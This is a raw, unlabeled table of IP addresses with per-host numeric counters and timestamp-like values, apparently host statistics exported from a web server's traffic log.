91.144.187.67 5 0 0 0 14 0 0 29129499 0 0 28692779 0 179.43.188.122 5 17 17 0 0 28992356 0 0 28607001 0 0 19497 35.171.144.152 5 0 0 0 1 0 0 29190598 0 0 29190598 0 42.234.107.243 5 1 1 0 21 29410639 0 29410639 29410639 0 29403111 623 195.24.236.50 5 1 1 0 2 29137952 0 29137952 29137952 0 29137952 512 157.245.222.34 5 2 2 0 0 29030112 0 0 29030112 0 0 512 90.22.103.31 5 2 2 0 28 29416373 0 29416373 29416373 0 29416373 628 194.180.49.167 5 1 1 0 0 29335301 0 0 29335301 0 0 1365 54.74.108.112 5 0 0 0 1 0 0 29125604 0 0 29125604 0 212.97.67.34 5 3 3 0 1 29320578 0 29320578 29320578 0 29320578 2046 45.249.246.66 5 0 0 0 2 0 0 28605909 0 0 28605909 0 109.205.213.18 5 5 5 0 0 28790416 0 0 28611588 0 0 6302 51.81.46.212 5 1 1 0 0 29174088 0 0 29174088 0 0 609 47.82.60.110 5 1 1 0 0 29220173 0 0 29220173 0 0 609 51.210.242.29 5 2 2 0 63 29325243 0 29325243 29325243 0 29325243 1364 3.26.208.34 5 1 1 0 0 29301922 0 0 29301922 0 0 682 34.122.244.156 5 0 0 0 5 0 0 29358938 0 0 29358938 0 188.32.160.13 5 1 1 0 2 29097720 0 29097720 29097720 0 29097720 512 64.226.87.229 5 1 1 0 0 29314920 0 0 29314920 0 0 1365 196.251.72.221 5 1 0 0 0 28773963 0 0 28773963 0 0 87 54.186.150.52 5 0 0 0 1 0 0 29350343 0 0 29350343 0 132.196.86.61 5 1 1 0 0 29224805 0 0 29224805 0 0 609 47.82.11.56 5 3 3 0 15 28598316 0 28598316 28598316 0 28598316 3134 143.244.168.161 5 1 1 0 0 29028165 0 0 29028165 0 0 512 47.82.11.53 5 2 2 0 0 29186955 0 0 29184679 0 0 1257 196.251.72.212 5 1 1 0 0 29155660 0 0 29155660 0 0 0 196.251.72.211 5 0 0 0 3 0 0 29369158 0 0 29369158 0 92.62.150.65 5 1 1 0 2 28895888 0 28895888 28895888 0 28895888 512 157.230.51.4 5 0 0 0 2 0 0 29140866 0 0 29140866 0 51.44.7.141 5 1 1 0 0 29199663 0 0 29199663 0 0 609 183.207.45.112 5 0 0 0 2 0 0 28990819 0 0 28990819 0 35.180.207.52 5 0 0 0 12 0 0 29093617 0 0 29093616 0 91.209.135.71 5 1 1 0 0 29288735 0 0 29288735 0 0 1257 196.251.83.56 5 1 1 0 2 29164554 0 29164554 29164554 0 29164554 509 206.189.238.59 5 8 8 0 8 29273719 0 29273719 29273719 0 29273719 4882 104.222.46.152 5 1 1 0 0 29303158 0 0 29303158 0 0 682 34.122.135.87 5 3 3 0 18 29102928 0 29102928 29102928 0 29102928 3099 192.145.125.94 5 1 0 0 0 28949645 0 0 28949645 0 0 87 51.20.248.85 5 1 0 0 0 29319617 0 0 29319617 0 0 362 47.82.11.35 5 1 1 0 0 28999276 0 0 28999276 0 0 509 110.172.98.2 5 0 0 0 1 0 0 29129246 0 0 29129246 0 44.200.209.152 5 1 1 0 0 29362482 0 0 29362482 0 0 0 196.251.83.100 5 1 1 0 1 28868202 0 28868202 28868202 0 28868202 512 64.227.191.111 5 1 1 0 1 29224259 0 29224258 29224259 0 29224258 609 192.3.198.26 5 0 0 0 1 0 0 28699631 0 0 28699631 0 121.36.11.242 5 1 1 0 11 29079415 0 29079415 29079415 0 29079415 509 15.188.246.255 5 0 0 0 3 0 0 29355662 0 0 29355662 0 89.188.101.198 5 1 1 0 0 29234519 0 0 29234519 0 0 609 47.82.11.25 5 2 2 0 2 28776040 0 28776040 28776040 0 28776040 1224 165.232.134.64 5 1 1 0 2 29124354 0 29124354 29124354 0 29124354 509 134.209.152.229 5 0 0 0 1 0 0 29099990 0 0 29099990 0 121.78.21.87 5 0 0 0 34 0 0 29341248 0 0 29341247 0 20.171.138.40 5 0 0 0 1 0 0 29313310 0 0 29313310 0 54.160.199.114 5 11 3 0 2 29176024 0 29176024 29176024 0 29176024 9499 123.6.49.50 5 1 1 0 2 28882371 0 28882371 28882371 0 28882371 509 128.199.46.132 5 1 1 0 1 29238528 0 29238528 29238528 0 29238528 609 167.71.21.184 5 1 1 0 0 29104241 0 0 29104241 0 0 512 68.65.120.171 5 1 1 0 0 28717760 0 0 28717760 0 0 1262 184.73.80.6 5 1 0 0 0 29037485 0 0 29037485 0 0 87 34.221.22.203 5 1 1 0 1 28842321 0 28842321 28842321 0 28842321 509 138.197.135.15 5 2 2 0 0 28603247 0 0 28603247 0 0 1224 64.227.2.220 5 3 1 0 0 29299572 0 0 29299572 0 0 3365 3.71.105.54 5 5 1 0 4 29176024 0 29176024 29176024 0 29176024 4982 123.6.49.44 5 0 0 0 1 0 0 29405740 0 0 29405740 0 74.7.228.54 5 1 1 0 2 28943452 0 28943452 28943452 0 28943452 509 206.189.19.245 5 0 0 0 8 0 0 29361379 0 0 29361379 0 176.115.145.106 5 0 0 0 1 0 0 29364456 0 0 29364456 0 31.130.6.159 5 1 1 0 0 29320094 0 0 29320094 0 0 682 173.236.154.166 5 2 2 0 1 29322219 0 29322219 29322219 0 29322219 1364 66.132.153.126 5 0 0 0 184 0 0 29278687 0 0 29277820 0 85.239.243.62 5 1 1 0 0 29065815 0 0 29065815 0 0 1037 54.155.16.185 5 5 5 0 0 29392800 0 0 29257690 0 0 2896 18.224.192.118 5 2 2 0 0 28620808 0 0 28620808 0 0 1216 167.99.239.90 5 1 0 0 0 29301183 0 0 29301183 0 0 87 3.22.171.131 5 2 2 0 0 29273719 0 0 29273719 0 0 1257 172.121.217.104 5 1 0 0 0 29389153 0 0 29389153 0 0 106 16.171.196.4 5 1 1 0 0 29268923 0 0 29268923 0 0 609 23.239.106.226 5 0 0 0 1 0 0 29372452 0 0 29372452 0 176.15.167.180 5 0 0 0 1 0 0 29368849 0 0 29368849 0 188.191.245.39 5 1 1 0 0 28761089 0 0 28761089 0 0 1262 3.254.181.239 5 5 1 0 1 28619043 0 28619043 28619043 0 28619043 4981 104.28.40.2 5 1 1 0 1 28862169 0 28862169 28862169 0 28862169 509 134.122.111.190 5 4 0 0 0 29176024 0 0 29176024 0 0 5410 123.6.49.18 5 1 1 0 0 29122502 0 0 29122502 0 0 509 192.64.117.2 5 1 1 0 1 28967545 0 28967545 28967545 0 28967545 512 167.94.138.207 5 1 1 0 1 29338764 0 29338764 29338764 0 29338764 682 128.199.26.1 5 5 1 0 1 29176024 0 29176024 29176024 0 29176024 5026 123.6.49.15 5 2 2 0 1 29238721 0 29238721 29238721 0 29238721 1218 167.94.138.205 5 7 1 0 0 28784461 0 0 28784459 0 0 8661 45.200.149.221 5 0 0 0 2 0 0 29176024 0 0 29176024 0 123.6.49.12 5 0 0 0 94 0 0 29325294 0 0 29325293 0 172.192.16.240 5 1 1 0 1 29277099 0 29277099 29277099 0 29277099 609 81.29.134.51 5 2 2 0 2 28734221 0 28734221 28734221 0 28734221 1224 64.227.40.72 5 1 1 0 2 29323749 0 29323749 29323749 0 29323749 682 2.58.56.223 5 3 3 0 17 29037487 0 29037487 29037486 0 29037486 2586 139.59.132.8 5 1 1 0 2 29020971 0 29020971 29020971 0 29020971 512 167.94.138.188 5 1 1 0 0 28749078 0 0 28749078 0 0 612 87.236.176.251 5 0 0 0 1 0 0 29405245 0 0 29405245 0 74.7.244.56 5 2 0 0 0 29389149 0 0 29389149 0 0 128 78.46.99.182 5 1 1 0 0 29179861 0 0 29179861 0 0 609 87.236.176.248 5 3 1 0 0 28873380 0 0 28873380 0 0 3195 35.90.157.116 5 5 1 0 1 28598320 0 28598320 28598320 0 28598320 4574 168.151.116.177 5 1 1 0 0 28846698 0 0 28846698 0 0 512 87.236.176.247 5 0 0 0 2 0 0 28950266 0 0 28950266 0 54.36.226.169 5 0 0 0 1 0 0 29307744 0 0 29307744 0 172.182.204.251 5 0 0 0 1 0 0 29267936 0 0 29267936 0 2.58.56.215 5 2 2 0 0 28700989 0 0 28700989 0 0 1216 165.22.177.74 5 1 0 0 0 28861803 0 0 28861803 0 0 87 3.138.138.87 5 2 2 0 1 29174666 0 29174666 29174666 0 29174666 1218 167.94.138.178 5 3 3 0 18 29306622 0 29306622 29306622 0 29306622 4095 34.55.204.78 5 2 0 0 0 29271246 0 0 29271246 0 0 2683 93.123.109.225 5 4 4 0 10 28691364 0 28691364 28691362 0 28691362 3747 107.150.101.57 5 3 3 0 33 29389153 0 29389153 29389153 0 29389153 1560 206.81.24.74 5 1 1 0 0 29122595 0 0 29122595 0 0 512 195.26.247.77 5 0 0 0 3 0 0 28952789 0 0 28952789 0 94.154.35.225 5 1 1 0 1 29325956 0 29325956 29325956 0 29325956 682 64.227.108.181 5 2 2 0 0 28686892 0 0 28599103 0 0 1224 171.244.43.14 5 1 1 0 0 28644860 0 0 28644860 0 0 612 87.236.176.232 5 3 1 0 0 29311565 0 0 29311565 0 0 9753 93.123.109.213 5 1 1 0 1 29265176 0 29265176 29265176 0 29265176 609 144.126.202.207 5 1 1 0 0 29391247 0 0 29391247 0 0 314 136.113.58.136 5 1 1 0 0 28956251 0 0 28956251 0 0 512 18.219.218.238 5 1 1 0 0 29179835 0 0 29179835 0 0 609 35.245.84.203 5 0 0 0 1 0 0 28775301 0 0 28775301 0 44.197.248.5 5 0 0 0 1 0 0 29392136 0 0 29392136 0 45.130.203.223 5 1 1 0 11 29127160 0 29127160 29127160 0 29127160 509 52.47.164.191 5 1 1 0 0 29225736 0 0 29225736 0 0 609 34.48.47.226 5 1 1 0 0 28626854 0 0 28626854 0 0 1262 3.249.229.80 5 5 1 0 1 28598539 0 28598539 28598539 0 28598539 4574 81.95.5.38 5 0 0 0 1 0 0 29361307 0 0 29361307 0 46.2.152.74 5 1 1 0 0 28600058 0 0 28600058 0 0 612 87.236.176.202 5 1 1 0 1 28673697 0 28673697 28673697 0 28673697 612 199.45.155.111 5 1 1 0 0 28598351 0 0 28598351 0 0 1261 64.15.129.123 5 0 0 0 1 0 0 29231833 0 0 29231833 0 172.182.204.204 5 0 0 0 3 0 0 29364327 0 0 29364327 0 193.35.48.196 5 0 0 0 1 0 0 29396615 0 0 29396615 0 93.123.109.175 5 1 1 0 0 29117830 0 0 29117830 0 0 512 3.86.16.79 5 0 0 0 3 0 0 29373626 0 0 29373626 0 31.23.49.55 5 1 1 0 1 28598351 0 28598351 28598351 0 28598351 1261 64.15.129.120 5 1 1 0 1 28835126 0 28835126 28835126 0 28835126 512 167.71.64.230 5 0 0 0 1 0 0 29301185 0 0 29301185 0 18.212.188.237 5 7 1 0 0 28780399 0 0 28780398 0 0 8661 94.156.68.236 5 2 2 0 0 28598318 0 0 28598318 0 0 1224 34.28.216.33 5 1 1 0 0 29135431 0 0 29135431 0 0 1037 64.15.129.112 5 1 1 0 0 28686848 0 0 28686848 0 0 612 47.251.14.232 5 0 0 0 2 0 0 29294911 0 0 29294911 0 185.54.231.27 5 4 4 0 2 29284463 0 29284462 29098215 0 29098216 2242 167.94.138.124 5 1 1 0 1 28776600 0 28776600 28776600 0 28776600 612 217.182.78.86 5 1 1 0 2 29184928 0 29184928 29184928 0 29184928 609 209.38.203.132 5 2 2 0 1 29111196 0 29111196 29111196 0 29111196 1024 167.94.138.118 5 0 0 0 1 0 0 29383844 0 0 29383844 0 142.248.80.2 5 1 1 0 1 28641921 0 28641921 28641921 0 28641921 612 167.94.138.116 5 1 1 0 0 29286203 0 0 29286203 0 0 609 35.230.168.245 5 1 1 0 11 29109717 0 29109717 29109717 0 29109717 512 13.38.109.95 5 1 1 0 0 29135431 0 0 29135431 0 0 1037 64.15.129.102 5 0 0 0 230 0 0 29326315 0 0 29291986 0 40.113.19.56 5 1 1 0 1 28865245 0 28865245 28865245 0 28865245 512 206.189.19.124 5 1 1 0 0 28603541 0 0 28603541 0 0 612 104.166.80.79 5 0 0 0 2 0 0 29126459 0 0 29126459 0 137.220.146.150 5 3 3 0 17 29374548 0 29374548 29374548 0 29374548 4095 128.199.76.30 5 3 1 0 1 28701918 0 28694984 28701918 0 28694984 3295 194.55.186.87 5 1 0 0 0 28983272 0 0 28983272 0 0 2321 34.235.161.235 5 1 1 0 3 28968419 0 28975315 28968419 0 28968419 509 157.245.201.195 5 1 1 0 1 28808242 0 28808242 28808242 0 28808242 608 44.233.116.1 5 1 1 0 0 29125507 0 0 29125507 0 0 512 188.126.89.113 5 1 1 0 0 29027188 0 0 29027188 0 0 512 47.82.11.7 5 1 1 0 0 28644592 0 0 28644592 0 0 612 87.236.176.149 5 1 0 0 0 29319621 0 0 29319621 0 0 2321 47.82.11.6 5 0 0 0 189 0 0 29388632 0 0 29388631 0 20.119.226.12 5 1 1 0 0 28604238 0 0 28604238 0 0 612 104.166.80.62 5 1 1 0 0 29338467 0 0 29338467 0 0 1365 45.138.16.48 5 1 1 0 1 28642084 0 28642084 28642084 0 28642084 612 199.45.154.72 5 3 3 0 18 29355252 0 29355252 29355252 0 29355252 4095 194.26.192.85 5 1 1 0 0 28748915 0 0 28748915 0 0 612 87.236.176.138 5 1 1 0 0 29217921 0 0 29217921 0 0 609 3.146.99.138 5 3 1 0 0 28979553 0 0 28979553 0 0 3195 149.202.65.95 5 0 0 0 1 0 0 29225295 0 0 29225295 0 138.2.235.92 5 3 1 0 2 28904006 0 28904006 28904006 0 28904006 2971 34.57.182.93 5 1 1 0 1 29197786 0 29197786 29197786 0 29197786 609 167.71.174.141 5 1 1 0 1 29147543 0 29147543 29147543 0 29147543 512 164.90.166.34 5 3 3 0 15 28773964 0 28773964 28773964 0 28773964 3134 46.101.1.225 5 1 1 0 0 28806230 0 0 28806230 0 0 1262 54.78.24.232 5 1 1 0 0 28803032 0 0 28803032 0 0 612 87.236.176.131 5 1 1 0 0 29313346 0 0 29313346 0 0 682 34.87.109.201 5 1 1 0 0 28802098 0 0 28802098 0 0 612 87.236.176.127 5 0 0 0 1 0 0 29368849 0 0 29368849 0 91.193.237.141 5 1 1 0 0 28660983 0 0 28660983 0 0 1261 205.210.31.254 5 1 1 0 5 28984122 0 28984122 28984122 0 28984122 0 143.110.252.227 5 5 1 0 0 28600601 0 0 28600601 0 0 4985 123.118.9.129 5 0 0 0 1 0 0 29089078 0 0 29089078 0 93.123.109.108 5 1 1 0 1 29286197 0 29286197 29286197 0 29286197 609 137.184.13.170 5 1 1 0 0 28632587 0 0 28632587 0 0 1257 205.210.31.248 5 1 1 0 2 29024029 0 29024029 29024029 0 29024029 509 143.244.129.248 5 0 0 0 1 0 0 29092191 0 0 29092191 0 93.123.109.107 5 0 0 0 1 0 0 28700954 0 0 28700954 0 83.147.52.49 5 1 1 0 0 29154643 0 0 29154643 0 0 512 177.234.154.90 5 0 0 0 2 0 0 29066957 0 0 29066957 0 68.183.236.23 5 4 1 0 0 29301185 0 0 28686124 0 0 6608 34.72.176.129 5 2 1 0 0 29099992 0 0 29099992 0 0 1793 156.59.208.59 5 2 2 0 0 29213350 0 0 29213350 0 0 1866 84.239.16.18 5 1 0 0 0 29099992 0 0 29099992 0 0 2321 156.59.208.56 5 1 1 0 0 28604993 0 0 28604993 0 0 612 104.166.80.32 5 1 1 0 2 29036336 0 29036336 29036336 0 29036336 512 174.138.7.206 5 1 1 0 0 29264211 0 0 29264211 0 0 609 34.86.30.133 5 3 1 0 0 29076220 0 0 29072495 0 0 2971 93.123.109.101 5 0 0 0 2 0 0 29145478 0 0 28871854 0 205.210.31.241 5 1 0 0 0 28907956 0 0 28907956 0 0 2321 3.0.19.143 5 2 2 0 0 29230692 0 0 28626846 0 0 2514 205.210.31.239 5 1 1 0 1 29216591 0 29216591 29216591 0 29216591 609 134.122.47.12 5 3 3 0 18 29125507 0 29125507 29125507 0 29125507 2586 164.92.107.174 5 0 0 0 1 0 0 29226377 0 0 29226377 0 194.26.192.53 5 1 0 0 1 29099992 0 29099992 29099992 0 29099992 362 156.59.208.48 5 1 1 0 15 28951751 0 28951751 28951751 0 28951751 1033 193.56.113.47 5 1 1 0 2 29117808 0 29117808 29117808 0 29117808 512 159.65.87.176 5 2 2 0 2 28721450 0 28721450 28721450 0 28721450 1216 157.230.84.89 5 1 1 0 0 29190599 0 0 29190599 0 0 609 223.74.126.189 5 1 1 0 0 29306775 0 0 29306775 0 0 1365 91.231.89.127 5 1 1 0 1 28687376 0 28687376 28687376 0 28687376 608 44.234.49.229 5 1 1 0 0 28602809 0 0 28602809 0 0 612 104.166.80.17 5 0 0 0 2 0 0 28686125 0 0 28686123 0 185.196.9.227 5 0 0 0 1 0 0 29348745 0 0 29348745 0 205.210.31.227 5 1 1 0 0 29218610 0 0 29218610 0 0 1257 91.231.89.125 5 1 1 0 0 29389191 0 0 29389191 0 0 623 91.231.89.124 5 1 1 0 1 28600321 0 28600321 28600321 0 28600321 612 199.45.154.26 5 1 1 0 0 29027521 0 0 29027521 0 0 512 47.82.10.241 5 1 1 0 1 29026598 0 29026598 29026598 0 29026598 512 167.71.226.49 5 1 1 0 0 29343610 0 0 29343610 0 0 682 92.205.96.46 5 1 1 0 0 28610126 0 0 28610126 0 0 1261 205.210.31.220 5 5 3 0 155 29248560 0 29248560 29248560 0 29248560 4510 185.177.72.56 5 3 1 0 2 29265337 0 29268138 29265337 0 29265337 3292 185.177.72.55 5 1 1 0 0 29277678 0 0 29277678 0 0 609 44.201.186.94 5 1 1 0 0 28620528 0 0 28620528 0 0 1258 205.210.31.213 5 0 0 0 1 0 0 29074657 0 0 29074657 0 205.210.31.209 5 3 1 0 2 28780353 0 28780353 28780353 0 28780353 3071 35.232.38.212 5 0 0 0 1 0 0 28919043 0 0 28919043 0 205.210.31.195 5 0 0 0 13 0 0 28777719 0 0 28777719 0 179.43.149.114 5 1 0 0 0 29301183 0 0 29301183 0 0 87 34.222.252.184 5 1 1 0 0 28741191 0 0 28741191 0 0 1262 205.210.31.192 5 1 1 0 0 28705334 0 0 28705334 0 0 1258 205.210.31.185 5 1 1 0 1 29144683 0 29144683 29144683 0 29144683 512 167.172.145.217 5 1 1 0 0 29026499 0 0 29026499 0 0 512 47.82.10.212 5 5 1 0 0 29301185 0 0 29301185 0 0 5055 3.85.192.51 5 1 1 0 0 29186749 0 0 29186749 0 0 609 173.212.240.93 5 0 0 0 1 0 0 29088704 0 0 29088704 0 93.123.109.77 5 2 2 0 0 29344311 0 0 29247970 0 0 1291 3.138.185.30 5 1 1 0 1 28788879 0 28788975 28788879 0 28788975 612 192.200.113.156 5 0 0 0 1 0 0 28660294 0 0 28660294 0 173.239.214.231 5 1 1 0 11 29048215 0 29048216 29048215 0 29048215 512 18.175.141.144 5 1 1 0 0 28670135 0 0 28670135 0 0 1262 34.241.79.193 5 1 1 0 2 29178430 0 29178430 29178430 0 29178430 609 209.38.241.204 5 18 6 0 0 28774999 0 0 28598795 0 0 19770 47.242.224.70 5 0 0 0 7 0 0 29213478 0 0 29213354 0 185.177.72.21 5 2 2 0 0 29368014 0 0 29338986 0 0 2730 45.138.16.228 5 1 1 0 1 29136144 0 29136144 29136144 0 29136144 512 146.190.219.25 5 1 1 0 1 29394334 0 29394334 29394334 0 29394334 314 91.90.126.137 5 1 1 0 0 29391428 0 0 29391428 0 0 314 104.198.2.129 5 1 1 0 0 29152602 0 0 29152602 0 0 512 185.104.44.163 5 1 1 0 0 29024097 0 0 29024097 0 0 512 47.79.3.52 5 6 6 0 3 29213346 0 29213346 28773964 0 28773964 3369 57.129.16.41 5 1 1 0 0 29314751 0 0 29314751 0 0 682 34.87.123.250 5 1 1 0 0 28617837 0 0 28617837 0 0 1258 205.210.31.166 5 1 1 0 0 28624400 0 0 28624400 0 0 1258 205.210.31.161 5 0 0 0 46 0 0 29255841 0 0 29210006 0 103.132.181.180 5 2 2 0 0 28926853 0 0 28742986 0 0 2290 205.210.31.159 5 1 1 0 0 29314731 0 0 29314731 0 0 682 34.10.248.25 5 1 1 0 2 28923172 0 28923172 28923172 0 28923172 509 164.90.207.15 5 0 0 0 3 0 0 29306792 0 0 29306792 0 193.233.203.207 5 2 2 0 0 28681375 0 0 28681375 0 0 1216 161.35.37.43 5 1 1 0 0 28618255 0 0 28618255 0 0 1261 205.210.31.155 5 1 1 0 1 29043837 0 29043837 29043837 0 29043837 512 152.42.135.18 5 1 0 0 0 29303996 0 0 29303996 0 0 2321 54.200.206.157 5 0 0 0 1 0 0 29250062 0 0 29250062 0 194.233.82.231 5 1 1 0 5 28989273 0 28989273 28989273 0 28989273 0 167.71.227.175 5 1 1 0 0 28607491 0 0 28607491 0 0 612 183.129.153.157 5 2 2 0 0 28673738 0 0 28673738 0 0 1224 157.230.234.74 5 1 1 0 0 28615484 0 0 28615484 0 0 1258 205.210.31.151 5 1 1 0 0 28657773 0 0 28657773 0 0 1261 54.82.38.67 5 0 0 0 2 0 0 29220843 0 0 29220843 0 157.230.242.88 5 1 1 0 0 29305998 0 0 29305998 0 0 682 54.88.225.160 5 1 1 0 0 28695594 0 0 28695594 0 0 1258 205.210.31.146 5 4 4 0 0 28951171 0 0 28774716 0 0 2135 88.99.26.177 5 1 1 0 1 29407122 0 29407122 29407122 0 29407122 314 142.93.177.114 5 2 2 0 0 28598326 0 0 28598325 0 0 1224 207.241.236.85 5 4 4 0 0 29367351 0 0 28785201 0 0 4921 205.210.31.144 5 1 1 0 0 28641811 0 0 28641811 0 0 1258 205.210.31.143 5 4 4 0 0 28780700 0 0 28686124 0 0 2448 207.241.236.83 5 1 1 0 0 29371336 0 0 29371336 0 0 1365 185.21.49.168 5 1 1 0 0 28622909 0 0 28622909 0 0 1262 205.210.31.142 5 2 2 0 1 29136929 0 29136929 29136929 0 29136929 1024 206.168.34.222 5 1 1 0 0 28651814 0 0 28651814 0 0 1261 205.210.31.141 5 1 1 0 2 29037490 0 29037490 29037490 0 29037490 512 206.168.34.221 5 0 0 0 1 0 0 29229312 0 0 29229312 0 54.159.219.240 5 1 1 0 0 29361051 0 0 29361051 0 0 1365 205.210.31.136 5 1 1 0 1 28948328 0 28948328 28948328 0 28948328 512 206.168.34.214 5 0 0 0 1 0 0 29190598 0 0 29190598 0 27.220.29.113 5 1 1 0 2 29043892 0 29043892 29043892 0 29043892 509 159.89.177.157 5 1 1 0 1 28894075 0 28894075 28894075 0 28894075 512 165.227.35.58 5 1 1 0 1 28598316 0 28598316 28598316 0 28598316 612 199.116.118.248 5 10 2 0 3 28795203 0 28811874 28606744 0 28642294 11956 92.118.39.244 5 1 1 0 0 29137077 0 0 29137077 0 0 1033 205.210.31.129 5 1 1 0 1 28957444 0 28957444 28957444 0 28957444 512 134.209.253.92 5 2 2 0 2 28714513 0 28714513 28714513 0 28714513 1224 68.183.106.142 5 1 0 0 0 28773963 0 0 28773963 0 0 87 18.119.12.143 5 4 4 0 10 28696719 0 28696719 28696716 0 28696716 3747 152.32.235.107 5 2 2 0 0 29273719 0 0 29273719 0 0 1257 104.168.40.185 5 2 2 0 1 29174724 0 29174723 29174723 0 29174723 1218 206.168.34.195 5 1 1 0 1 28827368 0 28827368 28827368 0 28827368 256 206.168.34.205 5 0 0 0 1 0 0 28788958 0 0 28788958 0 147.185.132.246 5 0 0 0 187 0 0 29299891 0 0 29277539 0 52.169.206.229 5 7 7 0 0 28956793 0 0 28647867 0 0 7858 54.88.179.33 5 0 0 0 1 0 0 29301184 0 0 29301184 0 13.221.41.71 5 1 1 0 0 29028006 0 0 29028006 0 0 512 47.82.10.132 5 1 1 0 0 29046057 0 0 29046057 0 0 512 209.74.67.53 5 1 0 0 0 29301183 0 0 29301183 0 0 87 13.212.212.39 5 1 1 0 0 28601373 0 0 28601373 0 0 612 104.166.80.0 5 3 3 0 18 29319674 0 29319674 29319674 0 29319674 4095 209.97.173.30 5 0 0 0 1 0 0 29354729 0 0 29354729 0 84.39.247.111 5 10 10 0 0 28774716 0 0 28598333 0 0 4256 195.211.77.142 5 0 0 0 1 0 0 29075362 0 0 29075362 0 205.210.31.107 5 4 4 0 0 28774716 0 0 28598332 0 0 0 195.211.77.140 5 1 1 0 0 28665925 0 0 28665925 0 0 1261 18.202.30.183 5 4 2 0 2 28949652 0 28949652 28949649 0 28949649 17482 106.75.137.67 5 1 1 0 1 29040988 0 29040988 29040988 0 29040988 512 167.172.139.167 5 2 1 0 1 28950013 0 28950013 28950013 0 28950013 8743 106.75.137.66 5 0 0 0 1 0 0 28868160 0 0 28868160 0 205.210.31.101 5 1 0 0 0 28949645 0 0 28949645 0 0 87 52.14.60.194 5 3 3 0 18 29127196 0 29127197 29127196 0 29127196 3099 54.169.226.46 5 1 1 0 0 29346947 0 0 29346947 0 0 682 185.247.137.50 5 2 2 0 2 28822763 0 28822763 28822763 0 28822763 1020 161.35.10.110 5 1 1 0 0 29393601 0 0 29393601 0 0 314 185.247.137.48 5 3 3 0 18 29213346 0 29213346 29213346 0 29213346 3123 157.245.36.108 5 1 0 0 0 28861803 0 0 28861803 0 0 87 47.128.67.177 5 1 1 0 0 28598435 0 0 28598435 0 0 612 104.166.80.247 5 1 0 0 0 28949645 0 0 28949645 0 0 87 34.219.134.236 5 0 0 0 5 0 0 29365390 0 0 29365390 0 5.188.9.122 5 1 1 0 0 29305046 0 0 29305046 0 0 682 34.169.221.35 5 1 1 0 0 29381236 0 0 29381236 0 0 314 34.68.206.104 5 1 1 0 1 29242476 0 29242476 29242476 0 29242476 609 157.230.49.27 5 5 2 0 0 28951504 0 0 28951504 0 0 4479 106.74.80.6 5 3 1 0 0 29015001 0 0 29015001 0 0 3195 217.114.43.197 5 0 0 0 2 0 0 29238407 0 0 29070482 0 147.185.132.195 5 1 1 0 0 29066320 0 0 29066320 0 0 512 185.247.137.36 5 1 1 0 2 29016611 0 29016611 29016611 0 29016611 512 159.223.10.200 5 1 1 0 0 29190598 0 0 29190598 0 0 1257 117.26.14.189 5 1 1 0 1 28968792 0 28968792 28968792 0 28968792 512 162.142.125.35 5 1 1 0 0 29391279 0 0 29391279 0 0 314 35.240.126.206 5 0 0 0 1 0 0 28781011 0 0 28781011 0 45.200.148.16 5 1 1 0 0 28607870 0 0 28607870 0 0 612 104.166.80.228 5 1 0 0 0 29037485 0 0 29037485 0 0 87 3.144.27.187 5 2 2 0 0 28613612 0 0 28599230 0 0 1224 104.166.80.224 5 0 0 0 1 0 0 28962585 0 0 28962585 0 147.185.132.180 5 1 1 0 15 28867962 0 28867962 28867962 0 28867962 1033 140.245.32.103 5 1 1 0 2 28916044 0 28916044 28916044 0 28916044 512 188.166.117.172 5 0 0 0 136 0 0 29402815 0 0 29402814 0 172.207.189.235 5 1 1 0 0 29190598 0 0 29190598 0 0 609 101.28.147.124 5 3 1 0 0 28777010 0 0 28777010 0 0 3295 3.127.230.104 5 2 2 0 0 28642426 0 0 28612890 0 0 1224 104.166.80.220 5 2 2 0 0 28660794 0 0 28660794 0 0 1216 128.199.51.222 5 0 0 0 1 0 0 29370693 0 0 29370693 0 74.7.230.45 5 1 1 0 0 29309243 0 0 29309243 0 0 682 34.123.111.205 5 1 1 0 0 29370684 0 0 29370684 0 0 1365 18.197.104.223 5 0 0 0 2 0 0 28886122 0 0 28886122 0 152.42.189.50 5 1 1 0 0 28607126 0 0 28607126 0 0 612 104.166.80.198 5 2 2 0 1 29173221 0 29173220 29173220 0 29173220 1218 206.168.34.94 5 0 0 0 1 0 0 29190077 0 0 29190077 0 156.59.29.231 5 8 4 0 1 28619379 0 28599309 28599309 0 28599309 6410 104.166.80.196 5 2 2 0 0 28690191 0 0 28690191 0 0 1224 44.220.42.213 5 1 1 0 0 28606425 0 0 28606425 0 0 612 104.166.80.194 5 0 0 0 12 0 0 29032976 0 0 29032976 0 217.114.43.161 5 0 0 0 20 0 0 28604394 0 0 28604394 0 91.215.85.43 5 1 1 0 0 28600680 0 0 28600680 0 0 612 104.166.80.192 5 1 1 0 0 29053026 0 0 29053026 0 0 1037 170.64.173.98 5 2 2 0 1 29222769 0 29222769 29222769 0 29222769 1218 206.168.34.86 5 0 0 0 1 0 0 29370132 0 0 29370132 0 74.7.230.26 5 0 0 0 1 0 0 29267696 0 0 29267696 0 13.231.110.173 5 0 0 0 1 0 0 29306782 0 0 29306782 0 91.196.152.228 5 0 0 0 2 0 0 29176994 0 0 29176994 0 69.253.203.152 5 3 3 0 15 28598316 0 28598316 28598316 0 28598316 3136 138.68.144.227 5 1 1 0 1 28774146 0 28774146 28774146 0 28774146 612 193.138.218.226 5 1 0 0 0 28598314 0 0 28598314 0 0 87 13.229.242.201 5 1 1 0 0 28605685 0 0 28605685 0 0 612 104.166.80.181 5 5 1 0 0 28598316 0 0 28598316 0 0 4985 34.116.159.132 5 0 0 0 1 0 0 29088736 0 0 29088736 0 79.124.58.138 5 2 2 0 2 28754613 0 28754613 28754613 0 28754613 1224 64.227.190.180 5 1 1 0 0 29346384 0 0 29346384 0 0 1365 147.185.132.141 5 1 1 0 11 29006384 0 29006385 29006384 0 29006384 509 35.181.153.172 5 3 1 0 2 28865008 0 28865008 28865008 0 28865008 2971 34.66.184.166 5 1 1 0 1 28771006 0 28771006 28771006 0 28771006 608 35.87.242.173 5 1 1 0 0 29041084 0 0 29041084 0 0 512 47.79.98.230 5 1 1 0 1 29219544 0 29219544 29219544 0 29219544 609 209.38.75.228 5 8 2 0 0 29301500 0 0 29301500 0 0 8196 205.169.39.233 5 1 1 0 0 28602110 0 0 28602110 0 0 612 104.166.80.162 5 2 2 0 0 28640434 0 0 28640434 0 0 1216 128.199.62.57 5 1 1 0 1 29058265 0 29058265 29058265 0 29058265 512 159.65.198.231 5 1 1 0 0 28609310 0 0 28609310 0 0 612 104.166.80.160 5 3 3 0 18 29301184 0 29301184 29301184 0 29301184 3412 138.197.191.87 5 1 0 0 0 29099990 0 0 29099990 0 0 362 121.78.21.225 5 1 1 0 0 28598491 0 0 28598491 0 0 612 104.166.80.156 5 1 1 0 1 28800227 